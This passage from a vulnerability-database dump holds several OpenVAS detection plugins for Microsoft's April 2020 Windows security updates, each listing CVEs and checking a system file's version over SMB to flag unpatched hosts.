MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816823\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0687\", \"CVE-2020-0821\", \"CVE-2020-0889\", \"CVE-2020-0895\",\n \"CVE-2020-0938\", \"CVE-2020-0946\", \"CVE-2020-0952\", \"CVE-2020-0953\",\n \"CVE-2020-0955\", \"CVE-2020-0956\", \"CVE-2020-0957\", \"CVE-2020-0958\",\n \"CVE-2020-0959\", \"CVE-2020-0960\", \"CVE-2020-0962\", \"CVE-2020-0964\",\n \"CVE-2020-0965\", \"CVE-2020-0966\", \"CVE-2020-0967\", \"CVE-2020-0968\",\n \"CVE-2020-0982\", \"CVE-2020-0987\", \"CVE-2020-0988\", \"CVE-2020-0992\",\n \"CVE-2020-0993\", \"CVE-2020-0994\", \"CVE-2020-0995\", \"CVE-2020-0999\",\n \"CVE-2020-1000\", \"CVE-2020-1004\", \"CVE-2020-1005\", \"CVE-2020-1007\",\n \"CVE-2020-1008\", \"CVE-2020-1009\", \"CVE-2020-1011\", \"CVE-2020-1014\",\n \"CVE-2020-1015\", \"CVE-2020-1020\", \"CVE-2020-1027\", \"CVE-2020-1094\",\n \"CVE-2020-0907\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-04-15 08:39:55 +0530 (Wed, 15 Apr 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4550964)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4550964\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to\n\n - An error when the Windows kernel improperly handles objects in memory.\n\n - Multiple errors in the way Microsoft Graphics Components handle objects in\n memory.\n\n - Multiple errors when the Windows Jet Database Engine improperly handles\n objects in memory.\n\n - An error in Windows DNS when it fails to properly handle queries.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows an attacker\n to execute arbitrary code on a victim system, disclose sensitive information,\n conduct denial-of-service condition and gain elevated privileges.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\n\n - Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4550964\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\ndllPath = smb_get_system32root();\nif(!dllPath)\n exit(0);\n\nfileVer = fetch_file_version(sysPath:dllPath, file_name:\"Win32k.sys\");\nif(!fileVer)\n exit(0);\n\nif(version_is_less(version:fileVer, test_version:\"6.1.7601.24551\")) {\n report = report_fixed_ver(file_checked:dllPath + \"\\Win32k.sys\",\n file_version:fileVer, vulnerable_range:\"Less than 6.1.7601.24551\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:50:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1016", "CVE-2020-0967", "CVE-2020-0962", "CVE-2020-0687", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0946", "CVE-2020-0958", "CVE-2020-0987", "CVE-2020-0992", "CVE-2020-1008", "CVE-2020-1094", "CVE-2020-0959", "CVE-2020-0956", "CVE-2020-0953", "CVE-2020-0938", "CVE-2020-0952", "CVE-2020-0993", "CVE-2020-0945", "CVE-2020-0988", "CVE-2020-1014", "CVE-2020-1003", "CVE-2020-1011", "CVE-2020-0821", "CVE-2020-1005", "CVE-2020-0999", "CVE-2020-0995", "CVE-2020-0960", "CVE-2020-0964", "CVE-2020-0982", "CVE-2020-1015", "CVE-2020-0955", "CVE-2020-1027", "CVE-2020-1020", "CVE-2020-0889", "CVE-2020-1009", "CVE-2020-0968", "CVE-2020-0966", "CVE-2020-1007", "CVE-2020-0936", "CVE-2020-1004", "CVE-2020-0994", "CVE-2020-0965"], "description": "This host is missing a critical security\n update according to Microsoft KB4550961", "modified": "2020-07-17T00:00:00", "published": "2020-04-15T00:00:00", "id": "OPENVAS:1361412562310816824", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816824", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4550961)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816824\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0687\", \"CVE-2020-0821\", \"CVE-2020-0889\", \"CVE-2020-0895\",\n \"CVE-2020-0907\", \"CVE-2020-0936\", \"CVE-2020-0938\", \"CVE-2020-0945\",\n \"CVE-2020-0946\", \"CVE-2020-0952\", \"CVE-2020-0953\", \"CVE-2020-0955\",\n \"CVE-2020-0956\", \"CVE-2020-0958\", \"CVE-2020-0959\", \"CVE-2020-0960\",\n \"CVE-2020-0962\", \"CVE-2020-0964\", \"CVE-2020-0965\", \"CVE-2020-0966\",\n \"CVE-2020-0967\", \"CVE-2020-0968\", \"CVE-2020-0982\", \"CVE-2020-0987\",\n \"CVE-2020-0988\", \"CVE-2020-0992\", \"CVE-2020-0993\", \"CVE-2020-0994\",\n \"CVE-2020-0995\", \"CVE-2020-0999\", \"CVE-2020-1003\", \"CVE-2020-1004\",\n \"CVE-2020-1005\", \"CVE-2020-1007\", \"CVE-2020-1008\", \"CVE-2020-1009\",\n \"CVE-2020-1011\", \"CVE-2020-1014\", \"CVE-2020-1015\", \"CVE-2020-1016\",\n \"CVE-2020-1020\", \"CVE-2020-1027\", \"CVE-2020-1094\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-04-15 08:39:55 +0530 (Wed, 15 Apr 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4550961)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4550961\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - An error in the way that the scripting engine handles objects in memory\n in Internet Explorer.\n\n - Multiple errors when the Microsoft Windows Graphics Component improperly\n handles objects in memory.\n\n - An error when the Windows Jet Database Engine improperly handles objects\n in memory.\n\n - An error when the win32k component improperly provides kernel information.\n\n - An error when the Windows GDI component improperly discloses the contents of its\n memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows an attacker\n to execute arbitrary code on a victim system, disclose sensitive information,\n conduct denial-of-service condition and gain elevated privileges.\");\n\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 for 32-bit/x64-based systems\n\n - Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4550961\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"Urlmon.dll\");\nif(!sysVer)\n exit(0);\n\nif(version_is_less(version:sysVer, test_version:\"11.0.9600.19678\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Urlmon.dll\",\n file_version:sysVer, vulnerable_range:\"Less than 11.0.9600.19678\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:50:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0950", "CVE-2020-1016", "CVE-2020-0967", "CVE-2020-0983", "CVE-2020-0962", "CVE-2020-0687", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0946", "CVE-2020-0948", "CVE-2020-0958", "CVE-2020-0987", "CVE-2020-0784", "CVE-2020-0992", "CVE-2020-1008", "CVE-2020-1094", "CVE-2020-0959", "CVE-2020-0956", "CVE-2020-0949", "CVE-2020-0953", "CVE-2020-0938", "CVE-2020-0952", "CVE-2020-0993", "CVE-2020-0945", "CVE-2020-0988", "CVE-2020-1014", "CVE-2020-0937", "CVE-2020-0985", "CVE-2020-1003", "CVE-2020-1011", "CVE-2020-0821", "CVE-2020-1005", "CVE-2020-0999", "CVE-2020-0995", "CVE-2020-0969", "CVE-2020-0960", "CVE-2020-0964", "CVE-2020-0982", "CVE-2020-1015", "CVE-2020-0955", "CVE-2020-1027", "CVE-2020-1020", "CVE-2020-0889", "CVE-2020-1009", "CVE-2020-0968", "CVE-2020-0966", "CVE-2020-1007", "CVE-2020-0936", "CVE-2020-1004", "CVE-2020-0994", "CVE-2020-0965"], "description": "This host is missing a critical security\n update according to Microsoft KB4550930", "modified": "2020-07-17T00:00:00", "published": "2020-04-15T00:00:00", "id": "OPENVAS:1361412562310816826", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816826", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4550930)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816826\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0687\", \"CVE-2020-0784\", \"CVE-2020-0821\", \"CVE-2020-0889\",\n \"CVE-2020-0895\", \"CVE-2020-0907\", \"CVE-2020-0936\", \"CVE-2020-0937\",\n \"CVE-2020-0938\", \"CVE-2020-0945\", \"CVE-2020-0946\", \"CVE-2020-0948\",\n \"CVE-2020-0949\", \"CVE-2020-0950\", \"CVE-2020-0952\", \"CVE-2020-0953\",\n \"CVE-2020-0955\", \"CVE-2020-0956\", \"CVE-2020-0958\", \"CVE-2020-0959\",\n \"CVE-2020-0960\", \"CVE-2020-0962\", \"CVE-2020-0964\", \"CVE-2020-0965\",\n \"CVE-2020-0966\", \"CVE-2020-0967\", \"CVE-2020-0968\", \"CVE-2020-0969\",\n \"CVE-2020-0982\", \"CVE-2020-0983\", \"CVE-2020-0985\", \"CVE-2020-0987\",\n \"CVE-2020-0988\", \"CVE-2020-0992\", \"CVE-2020-0993\", \"CVE-2020-0994\",\n \"CVE-2020-0995\", \"CVE-2020-0999\", \"CVE-2020-1003\", \"CVE-2020-1004\",\n \"CVE-2020-1005\", \"CVE-2020-1007\", \"CVE-2020-1008\", \"CVE-2020-1009\",\n \"CVE-2020-1011\", \"CVE-2020-1014\", \"CVE-2020-1015\", \"CVE-2020-1016\",\n \"CVE-2020-1020\", \"CVE-2020-1027\", \"CVE-2020-1094\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-04-15 08:39:55 +0530 (Wed, 15 Apr 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4550930)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4550930\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error in the way that the scripting engine handles objects in memory\n in Internet Explorer.\n\n - Multiple errors when the Microsoft Windows Graphics Component improperly\n handles objects in memory.\n\n - An error when the Windows Jet Database Engine improperly handles objects\n in memory.\n\n - An error when the Windows update stack fails to properly handle objects in\n memory.\n\n - An error when the Windows Delivery Optimization service improperly handles\n objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privilges, disclose sensitive information and\n conduct denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 for 32-bit Systems\n\n - Microsoft Windows 10 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4550930\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Kernel32.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.10240.0\", test_version2:\"10.0.10240.18544\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Kernel32.dll\",\n file_version:dllVer, vulnerable_range:\"10.0.10240.0 - 10.0.10240.18544\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:50:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0950", "CVE-2020-1016", "CVE-2020-0967", "CVE-2020-0983", "CVE-2020-0962", "CVE-2020-0687", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0946", "CVE-2020-0948", "CVE-2020-0958", "CVE-2020-0987", "CVE-2020-0784", "CVE-2020-0992", "CVE-2020-1008", "CVE-2020-1094", "CVE-2020-0940", "CVE-2020-0959", "CVE-2020-1017", "CVE-2020-0956", "CVE-2020-0949", "CVE-2020-0953", "CVE-2020-0938", "CVE-2020-0952", "CVE-2020-0942", "CVE-2020-0993", "CVE-2020-0945", "CVE-2020-0988", "CVE-2020-1014", "CVE-2020-0937", "CVE-2020-0985", "CVE-2020-1003", "CVE-2020-1000", "CVE-2020-1006", "CVE-2020-1011", "CVE-2020-0821", "CVE-2020-1005", "CVE-2020-0999", "CVE-2020-0995", "CVE-2020-0969", "CVE-2020-0960", "CVE-2020-0964", "CVE-2020-0982", "CVE-2020-1015", "CVE-2020-0955", "CVE-2020-1027", "CVE-2020-1020", "CVE-2020-0889", "CVE-2020-1009", "CVE-2020-0968", "CVE-2020-0966", "CVE-2020-1007", "CVE-2020-0936", "CVE-2020-1004", "CVE-2020-0994", "CVE-2020-0965"], "description": "This host is missing a critical security\n update according to Microsoft KB4550929", "modified": "2020-07-17T00:00:00", "published": "2020-04-15T00:00:00", "id": "OPENVAS:1361412562310816827", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816827", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4550929)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816827\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0687\", \"CVE-2020-0784\", \"CVE-2020-0821\", \"CVE-2020-0889\",\n \"CVE-2020-0895\", \"CVE-2020-0907\", \"CVE-2020-0936\", \"CVE-2020-0937\",\n \"CVE-2020-0938\", \"CVE-2020-0940\", \"CVE-2020-0942\", \"CVE-2020-0945\",\n \"CVE-2020-0946\", \"CVE-2020-0948\", \"CVE-2020-0949\", \"CVE-2020-0950\",\n \"CVE-2020-0952\", \"CVE-2020-0953\", \"CVE-2020-0955\", \"CVE-2020-0956\",\n \"CVE-2020-0958\", \"CVE-2020-0959\", \"CVE-2020-0960\", \"CVE-2020-0962\",\n \"CVE-2020-0964\", \"CVE-2020-0965\", \"CVE-2020-0966\", \"CVE-2020-0967\",\n \"CVE-2020-0968\", \"CVE-2020-0969\", \"CVE-2020-0982\", \"CVE-2020-0983\",\n \"CVE-2020-0985\", \"CVE-2020-0987\", \"CVE-2020-0988\", \"CVE-2020-0992\",\n \"CVE-2020-0993\", \"CVE-2020-0994\", \"CVE-2020-0995\", \"CVE-2020-0999\",\n \"CVE-2020-1000\", \"CVE-2020-1003\", \"CVE-2020-1004\", \"CVE-2020-1005\",\n \"CVE-2020-1006\", \"CVE-2020-1007\", \"CVE-2020-1008\", \"CVE-2020-1009\",\n \"CVE-2020-1011\", \"CVE-2020-1014\", \"CVE-2020-1015\", \"CVE-2020-1016\",\n \"CVE-2020-1017\", \"CVE-2020-1020\", \"CVE-2020-1027\", \"CVE-2020-1094\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-04-15 08:39:55 +0530 (Wed, 15 Apr 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4550929)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4550929\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error in the way that the scripting engine handles objects in memory\n in Internet Explorer.\n\n - Multiple errors when the Microsoft Windows Graphics Component improperly\n handles objects in memory.\n\n - An error when the Windows Jet Database Engine improperly handles objects\n in memory.\n\n - An error when the Windows update stack fails to properly handle objects in\n memory.\n\n - An error when the Windows Delivery Optimization service improperly handles\n objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privilges, disclose sensitive information and\n conduct denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4550929\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"Ntoskrnl.exe\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.14393.0\", test_version2:\"10.0.14393.3629\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\Ntoskrnl.exe\",\n file_version:dllVer, vulnerable_range:\"10.0.14393.0 - 10.0.14393.3629\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0950", "CVE-2020-1016", "CVE-2020-0967", "CVE-2020-0983", "CVE-2020-0962", "CVE-2020-0687", "CVE-2020-0895", "CVE-2020-0934", "CVE-2020-0907", "CVE-2020-0946", "CVE-2020-0948", "CVE-2020-0958", "CVE-2020-0794", "CVE-2020-0987", "CVE-2020-0996", "CVE-2020-0784", "CVE-2020-0992", "CVE-2020-1008", "CVE-2020-1094", "CVE-2020-0913", "CVE-2020-0940", "CVE-2020-0699", "CVE-2020-0959", "CVE-2020-0970", "CVE-2020-1017", "CVE-2020-0956", "CVE-2020-0949", "CVE-2020-1001", "CVE-2020-0953", "CVE-2020-0888", "CVE-2020-0938", "CVE-2020-0952", "CVE-2020-0942", "CVE-2020-0993", "CVE-2020-0945", "CVE-2020-0988", "CVE-2020-1014", "CVE-2020-0937", "CVE-2020-0985", "CVE-2020-1003", "CVE-2020-1000", "CVE-2020-1006", "CVE-2020-1011", "CVE-2020-0944", "CVE-2020-0821", "CVE-2020-1005", "CVE-2020-1029", "CVE-2020-0999", "CVE-2020-0995", "CVE-2020-0969", "CVE-2020-0960", "CVE-2020-0964", "CVE-2020-0982", "CVE-2020-1015", "CVE-2020-0955", "CVE-2020-1027", "CVE-2020-1020", "CVE-2020-0889", "CVE-2020-1009", "CVE-2020-0968", "CVE-2020-0966", "CVE-2020-1007", "CVE-2020-0936", "CVE-2020-1004", "CVE-2020-0994", "CVE-2020-0965"], "description": "This host is missing a critical security\n update according to Microsoft KB4550922", "modified": "2020-07-17T00:00:00", "published": "2020-04-15T00:00:00", "id": "OPENVAS:1361412562310816829", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816829", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4550922)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816829\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0687\", \"CVE-2020-0699\", \"CVE-2020-0784\", \"CVE-2020-0794\",\n \"CVE-2020-0821\", \"CVE-2020-0888\", \"CVE-2020-0889\", \"CVE-2020-0895\",\n \"CVE-2020-0907\", \"CVE-2020-0913\", \"CVE-2020-0934\", \"CVE-2020-0936\",\n \"CVE-2020-0937\", \"CVE-2020-0938\", \"CVE-2020-0940\", \"CVE-2020-0942\",\n \"CVE-2020-0944\", \"CVE-2020-0945\", \"CVE-2020-0946\", \"CVE-2020-0948\",\n \"CVE-2020-0949\", \"CVE-2020-0950\", \"CVE-2020-0952\", \"CVE-2020-0953\",\n \"CVE-2020-0955\", \"CVE-2020-0956\", \"CVE-2020-0958\", \"CVE-2020-0959\",\n \"CVE-2020-0960\", \"CVE-2020-0962\", \"CVE-2020-0964\", \"CVE-2020-0965\",\n \"CVE-2020-0966\", \"CVE-2020-0967\", \"CVE-2020-0968\", \"CVE-2020-0969\",\n \"CVE-2020-0970\", \"CVE-2020-0982\", \"CVE-2020-0983\", \"CVE-2020-0985\",\n \"CVE-2020-0987\", \"CVE-2020-0988\", \"CVE-2020-0992\", \"CVE-2020-0993\",\n \"CVE-2020-0994\", \"CVE-2020-0995\", \"CVE-2020-0996\", \"CVE-2020-0999\",\n \"CVE-2020-1000\", \"CVE-2020-1001\", \"CVE-2020-1003\", \"CVE-2020-1004\",\n \"CVE-2020-1005\", \"CVE-2020-1006\", \"CVE-2020-1007\", \"CVE-2020-1008\",\n \"CVE-2020-1009\", \"CVE-2020-1011\", \"CVE-2020-1014\", \"CVE-2020-1015\",\n \"CVE-2020-1016\", \"CVE-2020-1017\", \"CVE-2020-1020\", \"CVE-2020-1027\",\n \"CVE-2020-1029\", \"CVE-2020-1094\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-04-15 08:39:55 +0530 (Wed, 15 Apr 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4550922)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4550922\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error in the way that the scripting engine handles objects in memory\n in Internet Explorer.\n\n - Multiple errors when the Microsoft Windows Graphics Component improperly\n handles objects in memory.\n\n - An error when the Windows Jet Database Engine improperly handles objects\n in memory.\n\n - An error when the Windows update stack fails to properly handle objects in\n memory.\n\n - An error when the Windows Delivery Optimization service improperly handles\n objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, elevate privilges, disclose sensitive information and\n conduct denial of service attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1803 for 32-bit Systems\n\n - Microsoft 